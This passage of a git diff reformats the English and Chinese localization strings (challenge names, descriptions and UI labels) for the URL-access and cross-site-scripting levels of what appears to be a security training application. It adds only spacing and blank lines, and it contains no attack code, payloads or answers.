+reset.requestSent = Password reset request sent.
+
+error.occurred = An Error Occurred
+error.tooShort = Password is too short!
+error.noMatch = Passwords don't match!
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/urlAccess/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.properties b/src/main/resources/i18n/challenges/urlAccess/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.properties
index 926d2c0c5..a9784743c 100644
--- a/src/main/resources/i18n/challenges/urlAccess/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.properties
+++ b/src/main/resources/i18n/challenges/urlAccess/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.properties
@@ -1,5 +1,6 @@
-challenge.challengeName=Failure to Restrict URL Access Challenge 2
-challenge.description=An administrator of the following sub application would have no issue finding the result key to this level. But considering that you are a mere guest, you will not be shown the simple button administrators can click.
-challenge.form.getInfo=Get Guest Info
-sign.loading=Loading
-sign.hint=Would you like a hint?
\ No newline at end of file
+challenge.challengeName = Failure to Restrict URL Access Challenge 2
+challenge.description = An administrator of the following sub application would have no issue finding the result key to this level. But considering that you are a mere guest, you will not be shown the simple button administrators can click.
+challenge.form.getInfo = Get Guest Info
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/urlAccess/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.properties b/src/main/resources/i18n/challenges/urlAccess/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.properties
index 7082d72c7..d059fd5c4 100644
--- a/src/main/resources/i18n/challenges/urlAccess/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.properties
+++ b/src/main/resources/i18n/challenges/urlAccess/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.properties
@@ -1,8 +1,9 @@
-challenge.challengeName=Failure To Restrict URL Access Challenge 1
-challenge.description=To recover the result key for this challenge you need to obtain the current server status message from an administrator's point of view!
-challenge.form.instruction=Use this form to view the status of the server
-challenge.form.instruction.comment=from the point of view of a peasant or guest
-challenge.form.getStatus=Get Server Status
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Failure To Restrict URL Access Challenge 1
+challenge.description = To recover the result key for this challenge you need to obtain the current server status message from an administrator's point of view!
+challenge.form.instruction = Use this form to view the status of the server
+challenge.form.instruction.comment = from the point of view of a peasant or guest
+challenge.form.getStatus = Get Server Status
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/urlAccess/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.properties b/src/main/resources/i18n/challenges/urlAccess/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.properties
index 2ef5eb86d..004e88f23 100644
--- a/src/main/resources/i18n/challenges/urlAccess/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.properties
+++ b/src/main/resources/i18n/challenges/urlAccess/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.properties
@@ -1,6 +1,7 @@
-challenge.challengeName=Failure to Restrict URL Access Challenge 3
-challenge.description=Only highly privileged admin users of the following sub-application can retrieve the result key.
-challenge.form.adminButton=Admin Only Button
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Failure to Restrict URL Access Challenge 3
+challenge.description = Only highly privileged admin users of the following sub-application can retrieve the result key.
+challenge.form.adminButton = Admin Only Button
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.properties b/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.properties
index be00ba931..732d9462f 100644
--- a/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.properties
+++ b/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.properties
@@ -1,6 +1,8 @@
-challenge.challengeName=Cross Site Scripting Four
-challenge.description=Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers had heard that escaping is a better way of fixing XSS issues but they were not totally clear on how to implement it.
-challenge.form.instruction=Please enter the URL that you wish to post to your public profile;
-challenge.form.makePost=Make Post
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Four
+challenge.description = Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers had heard that escaping is a better way of fixing XSS issues but they were not totally clear on how to implement it.
+challenge.form.instruction = Please enter the URL that you wish to post to your public profile;
+challenge.form.makePost = Make Post
+
+sign.loading = Loading
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751_zh.properties b/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751_zh.properties
index b3937c4f5..5d89c5e90 100644
--- a/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751_zh.properties
@@ -1,6 +1,8 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 4
-challenge.description=\u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u5F00\u53D1\u4EBA\u5458\u542C\u8BF4\u4FEE\u590DXSS\u95EE\u9898\u7684\u4E00\u4E2A\u66F4\u597D\u7684\u65B9\u6CD5\u662F\u9003\u8131,\u89C4\u907F,\u4F46\u662F\u4ED6\u4EEC\u5E76\u4E0D\u662F\u975E\u5E38\u6E05\u695A\u5982\u4F55\u5B9E\u73B0\u8BE5\u529E\u6CD5.
-challenge.form.instruction=\u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684URL;
-challenge.form.makePost=\u53D1\u8868
-sign.loading=\u52A0\u8F7D
-error.occurred=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 4
+challenge.description = \u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u5F00\u53D1\u4EBA\u5458\u542C\u8BF4\u4FEE\u590DXSS\u95EE\u9898\u7684\u4E00\u4E2A\u66F4\u597D\u7684\u65B9\u6CD5\u662F\u9003\u8131,\u89C4\u907F,\u4F46\u662F\u4ED6\u4EEC\u5E76\u4E0D\u662F\u975E\u5E38\u6E05\u695A\u5982\u4F55\u5B9E\u73B0\u8BE5\u529E\u6CD5.
+challenge.form.instruction = \u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684URL;
+challenge.form.makePost = \u53D1\u8868
+
+sign.loading = \u52A0\u8F7D
+
+error.occurred = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.properties b/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.properties
index 512ec7030..1092362f9 100644
--- a/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.properties
+++ b/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=Cross Site Scripting Three
-challenge.description=Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
-challenge.form.instruction=Please enter the Search Term that you want to look up
-challenge.form.getUser=Get this user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Three
+challenge.description = Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
+challenge.form.instruction = Please enter the Search Term that you want to look up
+challenge.form.getUser = Get this user
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e_zh.properties b/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e_zh.properties
index 455fd2368..035e50c95 100644
--- a/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/ad2628bcc79bf10dd54ee62de148ab44b7bd028009a908ce3f1b4d019886d0e_zh.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 3
-challenge.description=\u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2\u641C\u7D22\u8BCD
-challenge.form.getUser=\u83B7\u53D6\u8BE5\u7528\u6237
-sign.loading=\u52A0\u8F7D\u4E2D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 3
+challenge.description = \u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2\u641C\u7D22\u8BCD
+challenge.form.getUser = \u83B7\u53D6\u8BE5\u7528\u6237
+
+sign.loading = \u52A0\u8F7D\u4E2D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.properties b/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.properties
index 3f639bbc2..8476bf842 100644
--- a/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.properties
+++ b/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf.properties
@@ -1,6 +1,8 @@
-challenge.challengeName=Cross Site Scripting Six
-challenge.description=Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers of this application wanted to demonstrate how HTTP links can be embedded in HTML and learned a bit about sanitizing their input for XSS attacks! Have a look by putting in your own HTTP link. The developers are only allowing HTTP URLs!
-challenge.form.instruction=Please enter the URL that you wish to post to your public profile;
-challenge.form.makePost=Make Post
-sign.loading=Loading
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Six
+challenge.description = Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers of this application wanted to demonstrate how HTTP links can be embedded in HTML and learned a bit about sanitizing their input for XSS attacks! Have a look by putting in your own HTTP link. The developers are only allowing HTTP URLs!
+challenge.form.instruction = Please enter the URL that you wish to post to your public profile;
+challenge.form.makePost = Make Post
+
+sign.loading = Loading
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf_zh.properties b/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf_zh.properties
index c677b3004..55a732814 100644
--- a/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/d330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf_zh.properties
@@ -1,8 +1,10 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 6
-challenge.description=\u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u8BE5\u5E94\u7528\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u60F3\u8981\u5C55\u793AHTTP\u94FE\u63A5\u662F\u5982\u4F55\u88AB\u5D4C\u5165\u5230HTML,\u5E76\u4E86\u89E3\u4E00\u4E9B\u5173\u4E8E\u4E3AXSS\u653B\u51FB\u505A\u7684\u8F93\u5165\u5904\u7406.\u8BD5\u8BD5\u8F93\u5165\u4F60\u81EA\u5DF1\u7684HTTP\u94FE\u63A5,\u53EA\u5141\u8BB8HTTP URLs!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684URL;
-challenge.form.makePost=\u53D1\u8868
-sign.loading=\u52A0\u8F7D
-error.occurred=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 6
+challenge.description = \u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u8BE5\u5E94\u7528\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u60F3\u8981\u5C55\u793AHTTP\u94FE\u63A5\u662F\u5982\u4F55\u88AB\u5D4C\u5165\u5230HTML,\u5E76\u4E86\u89E3\u4E00\u4E9B\u5173\u4E8E\u4E3AXSS\u653B\u51FB\u505A\u7684\u8F93\u5165\u5904\u7406.\u8BD5\u8BD5\u8F93\u5165\u4F60\u81EA\u5DF1\u7684HTTP\u94FE\u63A5,\u53EA\u5141\u8BB8HTTP URLs!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684URL;
+challenge.form.makePost = \u53D1\u8868
+
+sign.loading = \u52A0\u8F7D
+
+error.occurred = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
diff --git a/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.properties b/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.properties
index b1ad6bcb8..358abc4eb 100644
--- a/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.properties
+++ b/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=Cross Site Scripting One
-challenge.description=Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
-challenge.form.instruction=Please enter the Search Term that you want to look up
-challenge.form.getUser=Get this user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting One
+challenge.description = Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
+challenge.form.instruction = Please enter the Search Term that you want to look up
+challenge.form.getUser = Get this user
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa_zh.properties b/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa_zh.properties
index 5a199b220..81964bbd8 100644
--- a/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/d72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa_zh.properties
@@ -1,7 +1,10 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 1
-challenge.description=\u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2\u641C\u7D22\u8BCD
-challenge.form.getUser=\u83B7\u53D6\u8BE5\u7528\u6237
-sign.loading=\u52A0\u8F7D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 1
+challenge.description = \u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
+
+challenge.form.instruction = \u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2\u641C\u7D22\u8BCD
+challenge.form.getUser = \u83B7\u53D6\u8BE5\u7528\u6237
+
+sign.loading = \u52A0\u8F7D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.properties b/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.properties
index 44ba70f4a..497671a26 100644
--- a/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.properties
+++ b/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=Cross Site Scripting Five
-challenge.description=Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers of this sub application wanted to demonstrate how HTTP links can be embedded in HTML. Have a look by putting in your own HTTP link. The Developers are white listing input so only HTTP URLs are allowed!
-challenge.form.instruction=Please enter the URL that you wish to post to your public profile
-challenge.form.makePost=Make Post
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Five
+challenge.description = Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers of this sub application wanted to demonstrate how HTTP links can be embedded in HTML. Have a look by putting in your own HTTP link. The Developers are white listing input so only HTTP URLs are allowed!
+challenge.form.instruction = Please enter the URL that you wish to post to your public profile
+challenge.form.makePost = Make Post
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671_zh.properties b/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671_zh.properties
index 19b8556fe..7f4e7653b 100644
--- a/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671_zh.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 5
-challenge.description=\u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u8BE5\u5E94\u7528\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u60F3\u8981\u5C55\u793AHTTP\u94FE\u63A5\u662F\u5982\u4F55\u88AB\u5D4C\u5165\u5230HTML,\u5E76\u4E86\u89E3\u4E00\u4E9B\u5173\u4E8E\u4E3AXSS\u653B\u51FB\u505A\u7684\u8F93\u5165\u5904\u7406.\u8BD5\u8BD5\u8F93\u5165\u4F60\u81EA\u5DF1\u7684HTTP\u94FE\u63A5,\u53EA\u5141\u8BB8HTTP URLs!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684URL;
-challenge.form.makePost=\u53D1\u8868
-sign.loading=\u52A0\u8F7D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 5
+challenge.description = \u901A\u8FC7\u6267\u884CJavaScript\u8B66\u544A\u547D\u4EE4\u5728\u4EE5\u4E0B\u8868\u683C\u5C55\u793A\u4E00\u4E2AXSS\u6F0F\u6D1E.\u8BE5\u5E94\u7528\u7A0B\u5E8F\u7684\u5F00\u53D1\u4EBA\u5458\u60F3\u8981\u5C55\u793AHTTP\u94FE\u63A5\u662F\u5982\u4F55\u88AB\u5D4C\u5165\u5230HTML,\u5E76\u4E86\u89E3\u4E00\u4E9B\u5173\u4E8E\u4E3AXSS\u653B\u51FB\u505A\u7684\u8F93\u5165\u5904\u7406.\u8BD5\u8BD5\u8F93\u5165\u4F60\u81EA\u5DF1\u7684HTTP\u94FE\u63A5,\u53EA\u5141\u8BB8HTTP URLs!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u4F60\u8981\u53D1\u5E03\u5230\u4F60\u516C\u5F00\u4FE1\u606F\u7684URL;
+challenge.form.makePost = \u53D1\u8868
+
+sign.loading = \u52A0\u8F7D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.properties b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.properties
index 06368f86f..47c4ef368 100644
--- a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.properties
+++ b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=Cross Site Scripting Two
-challenge.description=Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
-challenge.form.instruction=Please enter the Search Term that you want to look up
-challenge.form.getUser=Get this user
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Cross Site Scripting Two
+challenge.description = Find a XSS vulnerability in the following form. It would appear that your input is been filtered!
+challenge.form.instruction = Please enter the Search Term that you want to look up
+challenge.form.getUser = Get this user
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_.properties b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_.properties
index 3e03090c5..3b85578fe 100644
--- a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_.properties
+++ b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 2
-challenge.description=\u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2\u641C\u7D22\u8BCD
-challenge.form.getUser=\u83B7\u53D6\u8BE5\u7528\u6237
-sign.loading=\u52A0\u8F7D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 2
+challenge.description = \u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2\u641C\u7D22\u8BCD
+challenge.form.getUser = \u83B7\u53D6\u8BE5\u7528\u6237
+
+sign.loading = \u52A0\u8F7D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_zh.properties b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_zh.properties
index 3e03090c5..3b85578fe 100644
--- a/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_zh.properties
+++ b/src/main/resources/i18n/challenges/xss/t27357536888e807ff0f0eff751d6034bafe48954575c3a6563cb47a85b1e888_zh.properties
@@ -1,7 +1,9 @@
-challenge.challengeName=\u8DE8\u7AD9\u811A\u672C\u653B\u51FB 2
-challenge.description=\u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
-challenge.form.instruction=\u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2\u641C\u7D22\u8BCD
-challenge.form.getUser=\u83B7\u53D6\u8BE5\u7528\u6237
-sign.loading=\u52A0\u8F7D
-sign.hint=\u4F60\u9700\u8981\u63D0\u793A\u5417?
-error.occurred=\u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
\ No newline at end of file
+challenge.challengeName = \u8DE8\u7AD9\u811A\u672C\u653B\u51FB 2
+challenge.description = \u5728\u4EE5\u4E0B\u8868\u683C\u4E2D\u627E\u51FA\u4E00\u4E2AXSS\u6F0F\u6D1E.\u60A8\u5C06\u6709\u53EF\u80FD\u770B\u5230,\u60A8\u6240\u8F93\u5165\u7684\u5DF2\u88AB\u8FC7\u6EE4!
+challenge.form.instruction = \u8BF7\u8F93\u5165\u60A8\u60F3\u8981\u67E5\u8BE2\u641C\u7D22\u8BCD
+challenge.form.getUser = \u83B7\u53D6\u8BE5\u7528\u6237
+
+sign.loading = \u52A0\u8F7D
+sign.hint = \u4F60\u9700\u8981\u63D0\u793A\u5417?
+
+error.occurred = \u6709\u4E00\u4E2A\u9519\u8BEF\u4EA7\u751F
